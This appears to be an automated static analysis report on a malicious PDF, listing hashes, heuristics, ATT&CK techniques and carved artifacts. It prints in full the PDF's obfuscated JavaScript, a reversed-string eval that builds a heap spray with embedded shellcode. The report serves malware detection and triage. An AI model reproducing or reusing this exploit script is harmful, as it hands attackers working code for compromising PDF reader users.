Malicious PDF — malware analysis report

Static analysis result for SHA-256 43e69f296324782a…

MALICIOUS

PDF

68.7 KB First seen: 2026-05-11
MD5: b564eb8e1f4f1bcc39dd4e507b6b584d SHA-1: 14049db364aac092cbe495da6b931d776511b30e SHA-256: 43e69f296324782a614d1540b224c4e5225deac170738a885d72eb5fad978335
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. This script, named 'javascript_obj0012_000.js', is likely designed to download and execute a second-stage payload from the embedded URL http://www.bitstream.com. The ASCIIHexDecode filter also suggests potential exploit activity within the PDF structure.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 5

  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3724 bytes
SHA-256: 78bab42ea050c9d2a12931eade2d98c996aa7c4040b068f89e657a45642a0857
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split("").join(""));
       var s='
 ;"s"+dD=]M[nBR )++M;0f1x0<M;0=M( rof ;)(yarrA wen = nBR rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.Sklja = dD ;Sklja =+ Sklja )00008x0 < htgnel.Sklja(elihw ;)2/63556 ,0(gnirtsbus.VMUrM = Sklja ;Ri =+ VMUrM ;ew =+ VMUrM ;)2/)42x0-c0c0x0( ,0(gnirtsbus.Ri = VMUrM ;Ri=+Ri )63556 < 8 + 02 + htgnel.Ri( elihw ;) "c" + "0" + "c" + "0" + "u%" + "c" + "0" + "c" + "0" + "u" + "%" (ssaU = Ri rav ;) 'bb14  u % ca26  u % 2ae8  u % 407c  u % b4be  u % 69b1  u % 8246  u % 6990  u % 607b  u % 58b5  u % ae5c  u % 8bbd  u % e90c  u % b33c  u % b683  u % 2004  u % cbaf  u % e5fb  u % 427a  u % 6b6d  u % 56d8  u % 93c9  u % ea8a  u % e330  u % 5272  u % 5523  u % a170  u % 5582  u % f1e3  u % 2889  u % d305  u % 65e9  u % 532b  u % 9eb3  u % 52ac  u % 6020  u % c7e6  u % c5b1  u % 8552  u % 60c3  u % 77ca  u % d89b  u % bf09  u % a045  u % 39c8  u % dbe1  u % 0de7  u % 8674  u % 3ff7  u % a9fd  u % ee7d  u % c3a4  u % 514a  u % 1894  u % dd75  u % e5a3  u % 99f6  u % 3522  u % 6ae5  u % b6d6  u % 54f6  u % 9bc1  u % dac6  u % c87a  u % 0552  u % f53b  u % 0641  u % 3dbe  u % 62ce  u % a7c5  u % 42cb  u % d85e  u % 10a7  u % dad9  u % dcde  u % d6c9  u % 8bfa  u % ebb6  u % fe0a  u % d493  u % 6acb  u % 8383  u % 6937  u % be7d  u % ae96  u % 725b  u % 225a  u % 6907  u % 3fa8  u % d15b  u % bd56  u % 687b  u % 57d4  u % 56c3  u % dff1  u % 438e  u % 68a4  u % 50ab  u % f0fa  u % 4f9d  u % cef4  u % 81c8  u % 3033  u % aecf  u % e038  u % 1324  u % 4fa5  u % 4742  u % ec9d  u % 339d  u % 9c1b  u % 9113  u % 21e6  u % 8b17  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % ' (ssaU = ew rav ;epacsenu = ssaU rav 
';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)